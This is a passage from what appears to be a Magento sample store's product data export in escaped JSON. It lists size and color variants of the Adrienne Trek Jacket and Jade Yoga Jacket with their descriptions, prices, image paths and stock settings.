ty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1264\":{\"sku\":\"WJ08-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-L-Orange\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1265\":{\"sku\":\"WJ08-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-L-Purple\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1266\":{\"sku\":\"WJ08-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-XL-Gray\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1267\":{\"sku\":\"WJ08-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-XL-Orange\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1268\":{\"sku\":\"WJ08-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket-XL-Purple\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"adrienne-trek-jacket-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1269\":{\"sku\":\"WJ08\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Adrienne Trek Jacket\",\"description\":\"<p>You\'re ready for a cross-country jog or a coffee on the patio in the Adrienne Trek Jacket. Its style is unique with stand collar and drawstrings, and it fits like a jacket should.<\\/p>\\n<p>&bull; gray 1\\/4 zip pullover.<br \\/>&bull; Comfortable, relaxed fit.<br \\/>&bull; Front zip for venting.<br \\/>&bull; Spacious, kangaroo pockets.<br \\/>&bull; 27\\\" body length.<br \\/>&bull; 95% Organic Cotton \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Lightweight|Rain Coat|Hard Shell|Windbreaker|&frac14; zip,material=Cotton|Spandex,pattern=Solid,climate=All-weather|Cool|Mild|Spring|Wintry,eco_collection=Yes,performance_fabric=No,erin_recommends=Yes,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ08-XS-Gray,size=XS,color=Gray|sku=WJ08-XS-Orange,size=XS,color=Orange|sku=WJ08-XS-Purple,size=XS,color=Purple|sku=WJ08-S-Gray,size=S,color=Gray|sku=WJ08-S-Orange,size=S,color=Orange|sku=WJ08-S-Purple,size=S,color=Purple|sku=WJ08-M-Gray,size=M,color=Gray|sku=WJ08-M-Orange,size=M,color=Orange|sku=WJ08-M-Purple,size=M,color=Purple|sku=WJ08-L-Gray,size=L,color=Gray|sku=WJ08-L-Orange,size=L,color=Orange|sku=WJ08-L-Purple,size=L,color=Purple|sku=WJ08-XL-Gray,size=XL,color=Gray|sku=WJ08-XL-Orange,size=XL,color=Orange|sku=WJ08-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj08-gray_alt1.jpg,\\/w\\/j\\/wj08-gray_alternate.jpg,\\/w\\/j\\/wj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Lightweight|Rain Coat|Hard Shell|Windbreaker|&frac14; zip\",\"material\":\"Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Mild|Spring|Wintry\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"Yes\"},\"1270\":{\"sku\":\"WJ09-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-XS-Blue\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1271\":{\"sku\":\"WJ09-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-XS-Gray\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\